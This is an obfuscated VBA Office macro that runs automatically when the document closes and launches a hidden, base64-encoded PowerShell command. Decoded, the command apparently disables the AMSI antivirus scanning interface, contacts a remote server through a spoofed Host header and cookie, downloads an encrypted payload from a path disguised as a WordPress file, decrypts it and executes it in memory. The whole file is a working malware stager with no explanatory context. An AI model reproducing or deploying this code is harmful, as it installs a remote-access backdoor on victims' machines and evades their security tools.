Sub AutoClose()
	jVlbkNhI
End Sub

Public Function jVlbkNhI() As Variant
	Dim GWvJWIZp As String
	GWvJWIZp = "powershell -noP -sta -w 1 -enc  SQBmACgAJABQAFMAVg"
	GWvJWIZp = GWvJWIZp + "BlAHIAcwBpAG8AbgBUAGEAYgBsAGUALgBQAFMAVgBlAHIAcwBp"
	GWvJWIZp = GWvJWIZp + "AG8AbgAuAE0AYQBqAG8AcgAgAC0AZwBlACAAMwApAHsAJABpAG"
	GWvJWIZp = GWvJWIZp + "QAIAA9ACAAZwBlAHQALQByAGEAbgBkAG8AbQA7ACQAUgBlAGYA"
	GWvJWIZp = GWvJWIZp + "IAA9ACAAKAAiAFMAeQBzAHQAZQBtACwAIABWAGUAcgBzAGkAbw"
	GWvJWIZp = GWvJWIZp + "BuAD0ANAAuADAALgAwAC4AMAAsACAAQwB1AGwAdAB1AHIAZQA9"
	GWvJWIZp = GWvJWIZp + "AG4AZQB1AHQAcgBhAGwALAAgAFAAdQBiAGwAaQBjAEsAZQB5AF"
	GWvJWIZp = GWvJWIZp + "QAbwBrAGUAbgA9AGIANwA3AGEANQBjADUANgAxADkAMwA0AGUA"
	GWvJWIZp = GWvJWIZp + "MAA4ADkAIgAsACIAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQ"
	GWvJWIZp = GWvJWIZp + "BlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMALAAg"
	GWvJWIZp = GWvJWIZp + "AFYAZQByAHMAaQBvAG4APQA0AC4AMAAuADAALgAwACwAIABDAH"
	GWvJWIZp = GWvJWIZp + "UAbAB0AHUAcgBlAD0AbgBlAHUAdAByAGEAbAAsACAAUAB1AGIA"
	GWvJWIZp = GWvJWIZp + "bABpAGMASwBlAHkAVABvAGsAZQBuAD0AYgAwADMAZgA1AGYANw"
	GWvJWIZp = GWvJWIZp + "BmADEAMQBkADUAMABhADMAYQAiACkAOwAkAFMAbwB1AHIAYwBl"
	GWvJWIZp = GWvJWIZp + "ACAAPQAgACIAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0AOwB1AH"
	GWvJWIZp = GWvJWIZp + "MAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUA"
	GWvJWIZp = GWvJWIZp + "LgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AG4AYQ"
	GWvJWIZp = GWvJWIZp + "BtAGUAcwBwAGEAYwBlACAAQgB5AHAAYQBzAHMAewBwAHUAYgBs"
	GWvJWIZp = GWvJWIZp + "AGkAYwAgAGMAbABhAHMAcwAgAEEATQBTAEkAJABpAGQAewBbAE"
	GWvJWIZp = GWvJWIZp + "QAbABsAEkAbQBwAG8AcgB0ACgAYAAiAGsAZQByAG4AZQBsADMA"
	GWvJWIZp = GWvJWIZp + "MgBgACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIA"
	GWvJWIZp = GWvJWIZp + "BlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAARwBlAHQAUABy"
	GWvJWIZp = GWvJWIZp + "AG8AYwBBAGQAZAByAGUAcwBzACgASQBuAHQAUAB0AHIAIABoAE"
	GWvJWIZp = GWvJWIZp + "0AbwBkAHUAbABlACwAIABzAHQAcgBpAG4AZwAgAHAAcgBvAGMA"
	GWvJWIZp = GWvJWIZp + "TgBhAG0AZQApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoAGAAIg"
	GWvJWIZp = GWvJWIZp + "BrAGUAcgBuAGUAbAAzADIAYAAiACkAXQBwAHUAYgBsAGkAYwAg"
	GWvJWIZp = GWvJWIZp + "AHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAH"
	GWvJWIZp = GWvJWIZp + "QAcgAgAEwAbwBhAGQATABpAGIAcgBhAHIAeQAoAHMAdAByAGkA"
	GWvJWIZp = GWvJWIZp + "bgBnACAAbgBhAG0AZQApADsAWwBEAGwAbABJAG0AcABvAHIAdA"
	GWvJWIZp = GWvJWIZp + "AoAGAAIgBrAGUAcgBuAGUAbAAzADIAYAAiACkAXQBwAHUAYgBs"
	GWvJWIZp = GWvJWIZp + "AGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABiAG"
	GWvJWIZp = GWvJWIZp + "8AbwBsACAAVgBpAHIAdAB1AGEAbABQAHIAbwB0AGUAYwB0ACgA"
	GWvJWIZp = GWvJWIZp + "SQBuAHQAUAB0AHIAIABsAHAAQQBkAGQAcgBlAHMAcwAsACAAVQ"
	GWvJWIZp = GWvJWIZp + "BJAG4AdABQAHQAcgAgAGQAdwBTAGkAegBlACwAIAB1AGkAbgB0"
	GWvJWIZp = GWvJWIZp + "ACAAZgBsAE4AZQB3AFAAcgBvAHQAZQBjAHQALAAgAG8AdQB0AC"
	GWvJWIZp = GWvJWIZp + "AAdQBpAG4AdAAgAGwAcABmAGwATwBsAGQAUAByAG8AdABlAGMA"
	GWvJWIZp = GWvJWIZp + "dAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoAGAAIgBLAGUAcg"
	GWvJWIZp = GWvJWIZp + "BuAGUAbAAzADIALgBkAGwAbABgACIALAAgAEUAbgB0AHIAeQBQ"
	GWvJWIZp = GWvJWIZp + "AG8AaQBuAHQAIAA9ACAAYAAiAFIAdABsAE0AbwB2AGUATQBlAG"
	GWvJWIZp = GWvJWIZp + "0AbwByAHkAYAAiACwAIABTAGUAdABMAGEAcwB0AEUAcgByAG8A"
	GWvJWIZp = GWvJWIZp + "cgAgAD0AIABmAGEAbABzAGUAKQBdAHMAdABhAHQAaQBjACAAZQ"
	GWvJWIZp = GWvJWIZp + "B4AHQAZQByAG4AIAB2AG8AaQBkACAATQBvAHYAZQBNAGUAbQBv"
	GWvJWIZp = GWvJWIZp + "AHIAeQAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAASQBuAH"
	GWvJWIZp = GWvJWIZp + "QAUAB0AHIAIABzAHIAYwAsACAAaQBuAHQAIABzAGkAegBlACkA"
	GWvJWIZp = GWvJWIZp + "OwBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAaQBuAHQAIA"
	GWvJWIZp = GWvJWIZp + "BEAGkAcwBhAGIAbABlACgAKQB7AEkAbgB0AFAAdAByACAAVABh"
	GWvJWIZp = GWvJWIZp + "AHIAZwBlAHQARABMAEwAIAA9ACAATABvAGEAZABMAGkAYgByAG"
	GWvJWIZp = GWvJWIZp + "EAcgB5ACgAYAAiAGEAbQBzAGkALgBkAGwAbABgACIAKQA7AGkA"
	GWvJWIZp = GWvJWIZp + "ZgAgACgAVABhAHIAZwBlAHQARABMAEwAIAA9AD0AIABJAG4AdA"
	GWvJWIZp = GWvJWIZp + "BQAHQAcgAuAFoAZQByAG8AKQAgAHsAIAByAGUAdAB1AHIAbgAg"
	GWvJWIZp = GWvJWIZp + "ADEAOwAgAH0ASQBuAHQAUAB0AHIAIABBAFMAQgBQAHQAcgAgAD"
	GWvJWIZp = GWvJWIZp + "0AIABHAGUAdABQAHIAbwBjAEEAZABkAHIAZQBzAHMAKABUAGEA"
	GWvJWIZp = GWvJWIZp + "cgBnAGUAdABEAEwATAAsACAAYAAiAEEAbQBzAGkAYAAiACAAKw"
	GWvJWIZp = GWvJWIZp + "AgAGAAIgBTAGMAYQBuAGAAIgAgACsAIABgACIAQgB1AGYAZgBl"
	GWvJWIZp = GWvJWIZp + "AHIAYAAiACkAOwBpAGYAIAAoAEEAUwBCAFAAdAByACAAPQA9AC"
	GWvJWIZp = GWvJWIZp + "AASQBuAHQAUAB0AHIALgBaAGUAcgBvACkAIAB7ACAAcgBlAHQA"
	GWvJWIZp = GWvJWIZp + "dQByAG4AIAAxADsAIAB9AFUASQBuAHQAUAB0AHIAIABkAHcAUw"
	GWvJWIZp = GWvJWIZp + "BpAHoAZQAgAD0AIAAoAFUASQBuAHQAUAB0AHIAKQA1ADsAdQBp"
	GWvJWIZp = GWvJWIZp + "AG4AdAAgAFoAZQByAG8AIAA9ACAAMAA7AGkAZgAgACgAIQBWAG"
	GWvJWIZp = GWvJWIZp + "kAcgB0AHUAYQBsAFAAcgBvAHQAZQBjAHQAKABBAFMAQgBQAHQA"
	GWvJWIZp = GWvJWIZp + "cgAsACAAZAB3AFMAaQB6AGUALAAgADAAeAA0ADAALAAgAG8AdQ"
	GWvJWIZp = GWvJWIZp + "B0ACAAWgBlAHIAbwApACkAIAB7ACAAcgBlAHQAdQByAG4AIAAx"
	GWvJWIZp = GWvJWIZp + "ADsAIAB9AEIAeQB0AGUAWwBdACAAUABhAHQAYwBoACAAPQAgAH"
	GWvJWIZp = GWvJWIZp + "sAIAAwAHgAQgA4ACwAIAAwAHgANQA3ACwAIAAwAHgAMAAwACwA"
	GWvJWIZp = GWvJWIZp + "IAAwAHgAMAA3ACwAIAAwAHgAOAAwACwAIAAwAHgAQwAzACAAfQ"
	GWvJWIZp = GWvJWIZp + "A7AEkAbgB0AFAAdAByACAAdQBuAG0AYQBuAGEAZwBlAGQAUABv"
	GWvJWIZp = GWvJWIZp + "AGkAbgB0AGUAcgAgAD0AIABNAGEAcgBzAGgAYQBsAC4AQQBsAG"
	GWvJWIZp = GWvJWIZp + "wAbwBjAEgARwBsAG8AYgBhAGwAKAA2ACkAOwBNAGEAcgBzAGgA"
	GWvJWIZp = GWvJWIZp + "YQBsAC4AQwBvAHAAeQAoAFAAYQB0AGMAaAAsACAAMAAsACAAdQ"
	GWvJWIZp = GWvJWIZp + "BuAG0AYQBuAGEAZwBlAGQAUABvAGkAbgB0AGUAcgAsACAANgAp"
	GWvJWIZp = GWvJWIZp + "ADsATQBvAHYAZQBNAGUAbQBvAHIAeQAoAEEAUwBCAFAAdAByAC"
	GWvJWIZp = GWvJWIZp + "wAIAB1AG4AbQBhAG4AYQBnAGUAZABQAG8AaQBuAHQAZQByACwA"
	GWvJWIZp = GWvJWIZp + "IAA2ACkAOwByAGUAdAB1AHIAbgAgADAAOwB9AH0AfQAiADsAQQ"
	GWvJWIZp = GWvJWIZp + "BkAGQALQBUAHkAcABlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBk"
	GWvJWIZp = GWvJWIZp + "AEEAcwBzAGUAbQBiAGwAaQBlAHMAIAAkAFIAZQBmACAALQBUAH"
	GWvJWIZp = GWvJWIZp + "kAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAFMAbwB1AHIA"
	GWvJWIZp = GWvJWIZp + "YwBlACAALQBMAGEAbgBnAHUAYQBnAGUAIABDAFMAaABhAHIAcA"
	GWvJWIZp = GWvJWIZp + "A7AGkAZQB4ACAAIgBbAEIAeQBwAGEAcwBzAC4AQQBNAFMASQAk"
	GWvJWIZp = GWvJWIZp + "AGkAZABdADoAOgBEAGkAcwBhAGIAbABlACgAKQAgAHwAIABPAH"
	GWvJWIZp = GWvJWIZp + "UAdAAtAE4AdQBsAGwAIgA7AH0AOwBbAFMAeQBzAHQAZQBtAC4A"
	GWvJWIZp = GWvJWIZp + "TgBlAHQALgBTAGUAcgB2AGkAYwBlAFAAbwBpAG4AdABNAGEAbg"
	GWvJWIZp = GWvJWIZp + "BhAGcAZQByAF0AOgA6AEUAeABwAGUAYwB0ADEAMAAwAEMAbwBu"
	GWvJWIZp = GWvJWIZp + "AHQAaQBuAHUAZQA9ADAAOwAkAEsAPQBbAFMAeQBzAHQAZQBtAC"
	GWvJWIZp = GWvJWIZp + "4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMA"
	GWvJWIZp = GWvJWIZp + "QwBJAEkALgBHAGUAdABCAHkAdABlAHMAKAAnAEkAdgBWAF4AWQ"
	GWvJWIZp = GWvJWIZp + "A6AEYAdABmAEMAWABUACwAPQBhAEEATQA/AGoAIwA3AE8AUQBw"
	GWvJWIZp = GWvJWIZp + "AF0AJgByAHwAWwBaAHgAbgAnACkAOwAkAFIAPQB7ACQARAAsAC"
	GWvJWIZp = GWvJWIZp + "QASwA9ACQAQQByAGcAcwA7ACQAUwA9ADAALgAuADIANQA1ADsA"
	GWvJWIZp = GWvJWIZp + "MAAuAC4AMgA1ADUAfAAlAHsAJABKAD0AKAAkAEoAKwAkAFMAWw"
	GWvJWIZp = GWvJWIZp + "AkAF8AXQArACQASwBbACQAXwAlACQASwAuAEMAbwB1AG4AdABd"
	GWvJWIZp = GWvJWIZp + "ACkAJQAyADUANgA7ACQAUwBbACQAXwBdACwAJABTAFsAJABKAF"
	GWvJWIZp = GWvJWIZp + "0APQAkAFMAWwAkAEoAXQAsACQAUwBbACQAXwBdAH0AOwAkAEQA"
	GWvJWIZp = GWvJWIZp + "fAAlAHsAJABJAD0AKAAkAEkAKwAxACkAJQAyADUANgA7ACQASA"
	GWvJWIZp = GWvJWIZp + "A9ACgAJABIACsAJABTAFsAJABJAF0AKQAlADIANQA2ADsAJABT"
	GWvJWIZp = GWvJWIZp + "AFsAJABJAF0ALAAkAFMAWwAkAEgAXQA9ACQAUwBbACQASABdAC"
	GWvJWIZp = GWvJWIZp + "wAJABTAFsAJABJAF0AOwAkAF8ALQBiAHgAbwByACQAUwBbACgA"
	GWvJWIZp = GWvJWIZp + "JABTAFsAJABJAF0AKwAkAFMAWwAkAEgAXQApACUAMgA1ADYAXQ"
	GWvJWIZp = GWvJWIZp + "B9AH0AOwAkAHcAYwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABT"
	GWvJWIZp = GWvJWIZp + "AHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAH"
	GWvJWIZp = GWvJWIZp + "QAOwAkAHMAZQByAD0AJAAoAFsAVABlAHgAdAAuAEUAbgBjAG8A"
	GWvJWIZp = GWvJWIZp + "ZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAUw"
	GWvJWIZp = GWvJWIZp + "B0AHIAaQBuAGcAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgBy"
	GWvJWIZp = GWvJWIZp + "AG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAYQBBAE"
	GWvJWIZp = GWvJWIZp + "IAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEA"
	GWvJWIZp = GWvJWIZp + "RABrAEEATQBnAEEAdQBBAEQARQBBAE4AZwBBADQAQQBDADQAQQ"
	GWvJWIZp = GWvJWIZp + "BNAGcAQQB4AEEAQwA0AEEATQBRAEEAeQBBAEQAZwBBAE8AZwBB"
	GWvJWIZp = GWvJWIZp + "ADQAQQBEAEEAQQAnACkAKQApADsAJAB0AD0AJwAvAHcAcAAtAG"
	GWvJWIZp = GWvJWIZp + "MAbwBuAHQAZQBuAHQALwB0AGgAZQBtAGUAcwAvAHcAcAAtAGYA"
	GWvJWIZp = GWvJWIZp + "cgBvAG4AdAAuAHAAaABwACcAOwAkAHcAYwAuAFAAcgBvAHgAeQ"
	GWvJWIZp = GWvJWIZp + "A9AFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAFIAZQBx"
	GWvJWIZp = GWvJWIZp + "AHUAZQBzAHQAXQA6ADoARABlAGYAYQB1AGwAdABXAGUAYgBQAH"
	GWvJWIZp = GWvJWIZp + "IAbwB4AHkAOwAkAHcAYwAuAFAAcgBvAHgAeQAuAEMAcgBlAGQA"
	GWvJWIZp = GWvJWIZp + "ZQBuAHQAaQBhAGwAcwAgAD0AIABbAFMAeQBzAHQAZQBtAC4ATg"
	GWvJWIZp = GWvJWIZp + "BlAHQALgBDAHIAZQBkAGUAbgB0AGkAYQBsAEMAYQBjAGgAZQBd"
	GWvJWIZp = GWvJWIZp + "ADoAOgBEAGUAZgBhAHUAbAB0AE4AZQB0AHcAbwByAGsAQwByAG"
	GWvJWIZp = GWvJWIZp + "UAZABlAG4AdABpAGEAbABzADsAJABTAGMAcgBpAHAAdAA6AFAA"
	GWvJWIZp = GWvJWIZp + "cgBvAHgAeQAgAD0AIAAkAHcAYwAuAFAAcgBvAHgAeQA7ACQAdw"
	GWvJWIZp = GWvJWIZp + "BjAC4ASABlAGEAZABlAHIAcwAuAEEAZABkACgAIgBVAHMAZQBy"
	GWvJWIZp = GWvJWIZp + "AC0AQQBnAGUAbgB0ACIALAAiAE0AbwB6AGkAbABsAGEALwA1AC"
	GWvJWIZp = GWvJWIZp + "4AMAAgACgAVwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAzADsA"
	GWvJWIZp = GWvJWIZp + "IABXAGkAbgA2ADQAOwAgAHgANgA0ACkAIABBAHAAcABsAGUAVw"
	GWvJWIZp = GWvJWIZp + "BlAGIASwBpAHQALwA1ADMANwAuADMANgAgACgASwBIAFQATQBM"
	GWvJWIZp = GWvJWIZp + "ACwAIABsAGkAawBlACAARwBlAGMAawBvACkAIABDAGgAcgBvAG"
	GWvJWIZp = GWvJWIZp + "0AZQAvADcAOQAuADAALgAzADkANAA1AC4AOAA4ACAAUwBhAGYA"
	GWvJWIZp = GWvJWIZp + "YQByAGkALwA1ADMANwAuADMANgAiACkAOwB0AHIAeQB7ACQAaQ"
	GWvJWIZp = GWvJWIZp + "BnAD0AJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQARABhAHQAYQAo"
	GWvJWIZp = GWvJWIZp + "ACQAcwBlAHIAKQB9AGMAYQB0AGMAaAB7AH0AOwAkAHcAYwAuAE"
	GWvJWIZp = GWvJWIZp + "gAZQBhAGQAZQByAHMALgBBAGQAZAAoACIASABvAHMAdAAiACwA"
	GWvJWIZp = GWvJWIZp + "IgB3AG0AdwBpAGYAYgBhAGoAeAB4AGIAYwB4AG0AdQBjAHgAbQ"
	GWvJWIZp = GWvJWIZp + "BsAGMALgBjAG8AbQAiACkAOwAkAHcAYwAuAEgAZQBhAGQAZQBy"
	GWvJWIZp = GWvJWIZp + "AHMALgBBAGQAZAAoACIAQwBvAG8AawBpAGUAIgAsACIAcwBlAH"
	GWvJWIZp = GWvJWIZp + "MAcwBpAG8AbgA9ADcAdwB2AGYAcgA2ADEAUABnAGcANgA0AHkA"
	GWvJWIZp = GWvJWIZp + "LwBqAFEASgB1AEMAMwA0AG0ASQAxAGUATQBNACUAMwBEACIAKQ"
	GWvJWIZp = GWvJWIZp + "A7ACQAZABhAHQAYQA9ACQAdwBjAC4ARABvAHcAbgBsAG8AYQBk"
	GWvJWIZp = GWvJWIZp + "AEQAYQB0AGEAKAAkAHMAZQByACsAJAB0ACkAOwAkAGkAdgA9AC"
	GWvJWIZp = GWvJWIZp + "QAZABhAHQAYQBbADAALgAuADMAXQA7ACQAZABhAHQAYQA9ACQA"
	GWvJWIZp = GWvJWIZp + "ZABhAHQAYQBbADQALgAuACgAJABkAGEAdABhAC4AbABlAG4AZw"
	GWvJWIZp = GWvJWIZp + "B0AGgALQAxACkAXQA7AC0AagBvAGkAbgBbAEMAaABhAHIAWwBd"
	GWvJWIZp = GWvJWIZp + "AF0AKAAmACAAJABSACAAJABkAGEAdABhACAAKAAkAEkAVgArAC"
	GWvJWIZp = GWvJWIZp + "QASwApACkAfABJAEUAWAA="
	Set asd = CreateObject("WScript.Shell")
	asd.Run(GWvJWIZp)
End Function
